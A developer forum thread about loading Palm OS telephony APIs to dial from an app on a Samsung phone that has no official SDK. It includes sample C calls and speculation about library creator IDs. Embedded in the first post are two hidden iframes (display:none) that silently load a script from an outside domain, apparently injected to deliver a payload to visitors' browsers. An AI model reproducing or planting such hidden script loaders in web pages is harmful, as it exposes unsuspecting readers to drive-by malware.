+ Reply to Thread

Question Dialing from within a Palm Application

Has anyone been able to load any of the telephony apis on this phone?
    Using:
    Err err;
    err = SysLibFind(kTelMgrLibName, nRefNum);
    if ( err == sysErrLibNotFound ) err = SysLibLoad( kTelMgrDatabaseType, kTelMgrDatabaseCreator, nRefNum );

I'm trying to load the api so that I can dial from an app, but have had no luck with loading the api. I think it may have something to do with kTelMgrDatabaseCreator which is 'tmgr' in the Palm 4.0 sdk.

Any help would be greatly appreciated, thanks bill

Also - Does anyone have a ROM?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Bill:
    What telephony APIs are you using. As far as I know, there had not been an SDK release for the phone from Samsung. The Kyo 6035 had one. Where did you get the SDK? My guess is that if it is not from Samsung, it will not work. Since I am not a Palm developer, I am mostly curious.
    Carl

Well Samsung was supposed to write their telephony apis according to Palms 4.0 telephony api. The problem is that when trying to load the libs using the 4.0 Palm SDK - the macros that define the creator id for the libs is not correct for the samsung phone. Therefore I was curious as to if anyone had gotten it to work, and if so, what macro defs did they use..

btw: You are correct - there is no sdk - which is what is causing this problem.

thanks - bill

hey billandr! I saw your posts on the sprint developers forum. i was thinking that maybe that adminiatrator dude 'hung' could put us in contact with some of those supposed korean developers of the phone app. (since he seemed to have contacted them) and maybe they could help us get the right api calls for the phone. also, its still unclear to me who wrote the actually phone apps for the i300: palm, samsung, or sprint..

regards,
    paul

Yep - I'm also starting to speak with one of the developers @ samsung, unfortunately it may take some time. I have come to realize that I may be forced to launching their phone app instead of using apis directly.

I guess I'll soon find out.

thanks - bill

Originally posted by CarlGalgano
    Bill:
    What telephony APIs are you using. As far as I know, there had not been an SDK release for the phone from Samsung. The Kyo 6035 had one. Where did you get the SDK? My guess is that if it is not from Samsung, it will not work. Since I am not a Palm developer, I am mostly curious.